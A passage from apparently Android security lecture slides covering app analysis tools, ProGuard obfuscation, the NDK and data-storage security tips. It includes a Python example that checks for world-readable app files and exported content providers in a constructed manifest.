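    for method, info in parse_smali(text).items():
        for call in info["calls"]:
            for api, reason in SENSITIVE_APIS.items():
                if call.startswith(api):
                    hits.append((method, api, reason, list(info["strings"])))
    return hits


if __name__ == "__main__":
    for method, api, reason, strings in find_sensitive_calls(SAMPLE_SMALI):
        print(f"{method}: {reason}; constants in method: {strings}")
```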

Slide 88

Static Analysis — dex2jar & jd-gui
- dex2jar: reverses dex to class files and packages them into a jar. https://code.google.com/p/dex2jar/
- jd-gui: JD-GUI is a standalone graphical utility that displays Java source code of ".class" files. http://jd.benow.ca/

Slide 89

Static Analysis — androguard
Androguard is mainly a tool written in Python to play with:
- Dex/Odex (Dalvik virtual machine) (.dex) (disassemble, decompilation)
- APK (Android application) (.apk)
- Android's binary XML (.xml)
- Android Resources (.arsc)

Slide 90

Static Analysis — androguard
Features:
- map DEX/ODEX/APK/AXML/ARSC formats into Python objects
- disassemble, decompile and modify DEX/ODEX/APK
- static analysis
- ipython / Sublime Text editor integration
- similarity measurement
- visualization

Slide 91

Dynamic Analysis — DroidBox
DroidBox is developed to offer dynamic analysis of Android applications:
- Hashes for the analyzed package
- Incoming/outgoing network data
- File read and write operations
- Started services and loaded classes through DexClassLoader
- Information leaks via the network, file and SMS
- Circumvented permissions
- Cryptography operations performed using the Android API
- Listing broadcast receivers
- Sent SMS and phone calls

Slide 92

Dynamic Analysis — TaintDroid
TaintDroid: Tracking how apps use sensitive information required integrating our software into the Android platform at a low level.
http://appanalysis.org/index.html
Demo: http://www.youtube.com/watch?v=qnLujX1Dw4Y

Slide 93

Online Analysis
- Anubis: generates an online analysis report. https://anubis.iseclab.org/
- VirusTotal: cloud detection (almost all detection engines). https://www.virustotal.com/

Slide 94

Outline
1 Introduction
2 Background
3 Attacks
4 Analysis Tools
5 Defense
  Obfuscation
  Android NDK
  Security Tips
6 Conclusion

Slide 95

Obfuscation — ProGuard
ProGuard is a free Java class file shrinker, optimizer, obfuscator, and preverifier. It detects and removes unused classes, fields, methods, and attributes. It optimizes bytecode and removes unused instructions. It renames the remaining classes, fields, and methods using short meaningless names.
ProGuard can be used for Android obfuscation, and is integrated in the Android build system.

Slide 96

Obfuscation — ProGuard
To enable ProGuard, set the proguard.config property in the /project.properties file:

    proguard.config=proguard.cfg

Slide 97

Obfuscation — ProGuard
Disassembling obfuscated code.

    pluginsdk
    |-- a
    |   |-- a.smali
    |   `-- b.smali
    |-- aa.smali
    |-- ab.smali
    |-- ac.smali
    |-- ad.smali
    |-- ae.smali
    |-- af.smali
    |-- ag.smali
    |-- ah.smali
    |-- ai.smali
    |-- aj.smali
    |-- ak.smali
    |-- al.smali
    |-- am.smali
    |-- an.smali
    |-- a.smali
    |-- b

    .method public final e(Ljava/lang/Class;)Lb/a
        .locals 1
        .parameter
        .prologue
        .line 45
        invoke-static {p1}, Lb/a/a/a;->f(Ljava/lang/Class;)Lb/a/a/a/a
        move-result-object v0
        iput-object v0, p0, Lb/a/a/a;->fWt:Lb/a/a/a
        .line 46
        return-object p0
    .end method

Slide 98

Android NDK

The Android NDK is a toolset that allows you to implement parts of your app in native-code languages such as C and C++. http://developer.android.com/tools/sdk/ndk/index.html
- more difficult to reverse engineer: there is no Dalvik bytecode to decompile, although the shared library still disassembles with standard native tools
- more complex
- less portable: a separate native library is needed for each target ABI
Native code also trades the Dalvik VM's memory safety for C/C++ memory-corruption bugs; see the "Security in native code" tip.

Slide 99

Security Tips — Storing Data

Using internal storage: by default, files on internal storage are accessible only to your app.
- avoid the MODE_WORLD_WRITEABLE and MODE_WORLD_READABLE modes (deprecated since API 17; from Android 7.0 they make openFileOutput() throw a SecurityException): they cannot limit data access to particular applications and give no control over data format
- encrypt sensitive data, so that a file which leaks anyway (rooted device, backup, world-readable mode) is still unreadable without the key

Slide 100

Security Tips — Storing Data

Using external storage: files on external storage (SD cards) are globally readable and writable, so any app can read or tamper with them.
- perform input validation on anything read back from external storage
- avoid putting dynamic payload (code, plugins, configuration) on external storage
- verify before loading: check a signature or hash that ships inside the APK, and run the check on the same bytes you then actually use, not on a file you re-read afterwards

Slide 101

Security Tips — Storing Data

Using content providers: a structured storage mechanism that can be limited to your own application or exported to allow access by other applications.
- mark android:exported="false" unless other apps must reach the provider; before API 17 a provider with no exported attribute was exported by default
- if it must be shared with your own apps only, guard it with a custom permission declared with android:protectionLevel="signature", so only apps signed with your key can obtain it
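The two checks an assessor runs for the internal-storage tip (Slide 99) and the content-provider tip (Slide 101), written in Python as an added example rather than code from the slides. The inputs are constructed: LS_OUTPUT imitates `adb shell ls -l` over an app's private shared_prefs directory on a rooted device, and MANIFEST is a minimal AndroidManifest.xml; the package, file and class names are made up. The provider check applies the rule from the slide that a provider without android:exported is exported by default when minSdkVersion or targetSdkVersion is below 17.

```python
"""Two checks behind the storing-data tips: files in an app's private
directory that other apps can read or write, and content providers that
other apps can reach.

Added example, not from the slides. LS_OUTPUT imitates
`adb shell ls -l /data/data/<pkg>/shared_prefs` on a rooted device and
MANIFEST is a minimal AndroidManifest.xml; package, file and class names are
constructed for the example.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed listing. cache.xml is what MODE_WORLD_READABLE produces,
# token.xml what MODE_WORLD_WRITEABLE produces.
LS_OUTPUT = """\
-rw-rw---- u0_a123 u0_a123    412 2015-11-02 10:12 session.xml
-rw-rw---- u0_a123 u0_a123   1024 2015-11-02 10:12 settings.xml
-rw-r--r-- u0_a123 u0_a123   2048 2015-11-02 10:13 cache.xml
-rw-rw-rw- u0_a123 u0_a123     96 2015-11-02 10:14 token.xml
"""

MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.notes">
  <uses-sdk android:minSdkVersion="14" android:targetSdkVersion="21"/>
  <permission android:name="com.example.notes.READ_NOTES"
              android:protectionLevel="signature"/>
  <application>
    <provider android:name=".NotesProvider"
              android:authorities="com.example.notes"/>
    <provider android:name=".SyncProvider"
              android:authorities="com.example.notes.sync"
              android:exported="true"
              android:permission="com.example.notes.READ_NOTES"/>
    <provider android:name=".CacheProvider"
              android:authorities="com.example.notes.cache"
              android:exported="false"/>
  </application>
</manifest>
"""


def world_accessible_files(listing):
    """Return [(name, bits)] for entries whose 'other' permission bits are set.

    bits is 'r', 'w' or 'rw'. The mode string is the first field of ls -l
    output and is ten characters: type + owner rwx + group rwx + other rwx.
    """
    findings = []
    for line in listing.splitlines():
        fields = line.split()
        if len(fields) < 7 or len(fields[0]) != 10:
            continue
        other = fields[0][7:10]
        bits = ("r" if other[0] == "r" else "") + ("w" if other[1] == "w" else "")
        if bits:
            findings.append((fields[-1], bits))
    return findings


def _attr(el, name):
    return el.get("{%s}%s" % (ANDROID_NS, name))


def exposed_providers(manifest_xml):
    """Return [(provider, reason)] for providers that apps signed with another
    key can reach: exported (explicitly, or by the pre-API-17 default) and not
    guarded by a signature-level permission declared in this package."""
    root = ET.fromstring(manifest_xml)
    uses_sdk = root.find("uses-sdk")
    min_sdk = int(_attr(uses_sdk, "minSdkVersion") or 1) if uses_sdk is not None else 1
    target_sdk = int(_attr(uses_sdk, "targetSdkVersion") or min_sdk) if uses_sdk is not None else min_sdk
    signature_perms = {
        _attr(p, "name") for p in root.findall("permission")
        if _attr(p, "protectionLevel") == "signature"
    }
    findings = []
    for prov in root.iter("provider"):
        exported = _attr(prov, "exported")
        if exported is None:
            # Providers without android:exported default to exported=true when
            # minSdkVersion or targetSdkVersion is 16 or lower.
            if not (min_sdk < 17 or target_sdk < 17):
                continue
            reason = "no android:exported attribute; defaults to true below API 17"
        elif exported == "true":
            reason = "android:exported=true"
        else:
            continue
        perm = _attr(prov, "permission")
        read_perm = _attr(prov, "readPermission")
        write_perm = _attr(prov, "writePermission")
        if perm in signature_perms or (read_perm in signature_perms and write_perm in signature_perms):
            continue
        if perm is not None:
            reason += ", permission %s is not signature-level" % perm
        findings.append((_attr(prov, "name"), reason))
    return findings


if __name__ == "__main__":
    print(world_accessible_files(LS_OUTPUT))
    print(exposed_providers(MANIFEST))
```

On the constructed inputs the first check flags cache.xml (world-readable) and token.xml (world-readable and writable), and the second flags only NotesProvider: SyncProvider is exported but reachable only by apps holding a signature-level permission, and CacheProvider is not exported. Raising minSdkVersion to 17 makes the NotesProvider finding disappear, which is exactly why relying on the default is fragile and the attribute should be written out explicitly.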

Slide 102

Security Tips from developer.android.com [2]
- Storing data
- Using permissions: requesting permissions, creating permissions
- Using networking: using IP networking, using telephony networking
- Performing input validation
- Handling user data
- Using WebView
- Using cryptography
- Using IPC
- Dynamically loading code
- Security in a VM
- Security in native code

Slide 103

Conclusion I
1 Introduction
2 Background
  How to Build an Android Application?
  Application Fundamentals
  APK File Structure
  Android Architecture
  Android Platform Security Architecture
  Distribution Methods of Apps
3 Attacks
  Android Malware
  Malware Distribution
  Vulnerabilities of Android OS
  Android Apps Security
4 Analysis Tools

Slide 104

Conclusion II
  Tools in Android SDK
  Static Analysis
  Dynamic Analysis
  Online Analysis
5 Defense
  Obfuscation
  Android NDK
  Security Tips
6 Conclusion

Slide 105

References I
- Qihoo 360. http://blogs.360.cn/360mobile/2014/01/17/oldboot-the-first-bootkit-on-android/
- Android. http://developer.android.com/training/articles/security-tips.html
- William Enck, Peter Gilbert, Byung-Gon Chun, Landon P. Cox, Jaeyeon Jung, Patrick McDaniel, and Anmol Sheth. "TaintDroid: An Information-Flow Tracking System for Realtime Privacy Monitoring on Smartphones." In: OSDI. Vol. 10. 2010, pp. 1–6.
- Adrienne Porter Felt, Helen J. Wang, Alexander Moshchuk, Steve Hanna, and Erika Chin. "Permission Re-Delegation: Attacks and Defenses." In: USENIX Security Symposium. 2011.
- Jim Huang. Android IPC Mechanism. http://www.slideshare.net/jserv/android-ipc-mechanism

Slide 106

References II
- Jim Huang. Understanding the Dalvik Virtual Machine. http://www.slideshare.net/jserv/understanding-the-dalvik-virtual-machine
- Activity Lifecycle. http://docs.xamarin.com/guides/android/application_fundamentals/activity_lifecycle/
- Lookout. Mobile Threats, Made to Measure. https://www.lookout.com/static/ee_images/Mobile_Threats_Made_to_Measure_Lookout_Report_2013.pdf
- Tongbo Luo, Hao Hao, Wenliang Du, Yifei Wang, and Heng Yin. "Attacks on WebView in the Android System." In: Proceedings of the 27th Annual Computer Security Applications Conference. ACM. 2011, pp. 343–352.
- C. Enrique Ortiz. Understanding Security on Android. http://www.ibm.com/developerworks/library/x-androidsecurity/
- Slashdot. http://beta.slashdot.org/submission/3273305/security-researcher-found-the-first-android-bootkit-in-the-wild

Slide 107

References III
- Symantec. Mobile Adware and Malware Analysis. http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/madware_and_malware_analysis.pdf
- Claud Xiao. "Android Apps Security in Practice." In: xKungfu. 2013.
- Veo Zhang. Trojanized Flappy Bird Comes on the Heels of Takedown by App Creator. http://blog.trendmicro.com/trendlabs-security-intelligence/trojanized-flappy-bird-comes-on-the-heels-of-takedown-by-app-creator/
- Yajin Zhou and Xuxian Jiang. "Dissecting Android Malware: Characterization and Evolution." In: Security and Privacy (SP), 2012 IEEE Symposium on. IEEE. 2012, pp. 95–109.